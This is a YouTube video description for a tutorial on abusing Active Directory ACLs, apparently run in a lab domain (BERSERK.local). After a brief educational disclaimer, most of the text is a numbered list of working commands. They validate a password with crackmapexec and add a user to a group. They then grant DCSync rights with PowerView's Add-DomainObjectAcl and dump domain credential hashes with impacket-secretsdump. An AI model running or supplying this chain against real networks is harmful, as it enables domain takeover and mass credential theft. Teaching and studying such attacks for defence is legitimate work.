ACLs Abuse
Welcome to my YouTube channel. In this video, I delve into ACLs abuse, aiming to provide valuable insights and educational content.
Educational Purpose:
Learn how to exploit ACLs in an active directory environment.
Disclaimer:
This video is intended solely for educational purposes. It explores Active Directory Attack vector - ACLsAbuse. I do not endorse or encourage any unethical or malicious activities.
Community Guidelines Compliance:
I adhere to YouTube's community guidelines and standards. If you have any concerns or questions, please feel free to reach out, and I'll address them promptly.
Commands used:
1) crackmapexec smb 10.0.2.16 -u abuse -p 'ACL@rocks'
2) xfreerdp /u:abuse /p:ACL@rocks /v:10.0.2.28
3) net group "ACLabuse" /domain
4) net group "ACLabuse" abuse /add /domain
5) $SecPassword = ConvertTo-SecureString 'ACL@rocks' -AsPlainText -Force
6) $Cred = New-Object System.Management.Automation.PSCredential('BERSERK.local\abuse', $SecPassword)
7) . .\PowerView.ps1
8) Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'test' -TargetIdentity 'BERSERK.LOCAL\Domain Admins' -Rights DCSync
9) impacket-secretsdump BERSERK.local/abuse:'ACL@rocks'@10.0.2.16
